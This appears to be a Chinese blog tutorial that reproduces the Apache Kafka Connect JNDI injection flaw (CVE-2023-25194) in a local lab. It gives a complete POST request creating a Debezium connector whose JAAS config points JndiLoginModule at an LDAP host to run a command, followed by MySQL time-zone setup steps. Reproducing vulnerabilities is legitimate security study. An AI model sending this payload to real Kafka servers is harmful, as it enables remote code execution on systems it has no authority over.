Apache Kafka JNDI注入漏洞(CVE-2023-25194)

搭建漏洞环境(如果启动报错建议更换为JAVA11)

kafka_2.11-2.4.0.rar(74.6 MB)

http://archive.apache.org/dist/kafka/2.4.0/kafka_2.11-2.4.0.tgz

 

启动命令

binwindowszookeeper-server-start.bat configzookeeper.properties

binwindowskafka-server-start.bat configserver.properties

binwindowsconnect-standalone.bat config/connect-standalone.properties config/connect-file-source.properties config/connect-file-sink.properties

如果提示 输入行太长 命令语法不正确,输入:

set CLASSPATH=

漏洞复现

访问http://127.0.0.1:8083/connector-plugins查看是否存在依赖

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

接着使用如下请求包创建连接器

POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 821

{
	"name": "debezium-test-50173",
	"config": {
		"connector.class": "io.debezium.connector.mysql.MySqlConnector",
		"database.hostname": "127.0.0.1",
		"database.port": "3306",
		"database.user": "root",
		"database.password": "root",
		"database.server.id": "316545017",
		"database.server.name": "test1",
		"database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
		"database.history.kafka.topic": "quickstart-events",   	"database.history.producer.security.protocol": "SASL_SSL",
    	"database.history.producer.sasl.mechanism": "PLAIN",
    	"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://ip:8089/Basic/Command/calc" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"
	}
}

注:需要对数据库进行配置(时区设置)

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

 

查看time_zone变量

show variables like '%time_zone%';

 

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

 

设置时期(重启数据库无效):

set global time_zone = '+8:00';
flush privileges;#使之立即生效。
show variables like '%time_zone%';

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

 

方法2:

修改配置文件 /etc/my.cnf

[mysqld]
default-time_zone = '+8:00'

查询时间,检验时间对不对

select now();

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

没有用的话重启mysql试一下

 systemctl stop mysqld.service
  systemctl start mysqld.service

 

 

THE END
分享
二维码
海报
Apache Kafka JNDI注入漏洞(CVE-2023-25194)
搭建漏洞环境(如果启动报错建议更换为JAVA11) kafka_2.11-2.4.0.rar(74.6 MB) 或 http://archive.apache.org/dist/kafka/2.4.0/kafka_2.11-2.4.0.tgz   启动命令 binwindowszookeeper-server-start.bat ……
<<上一篇
下一篇>>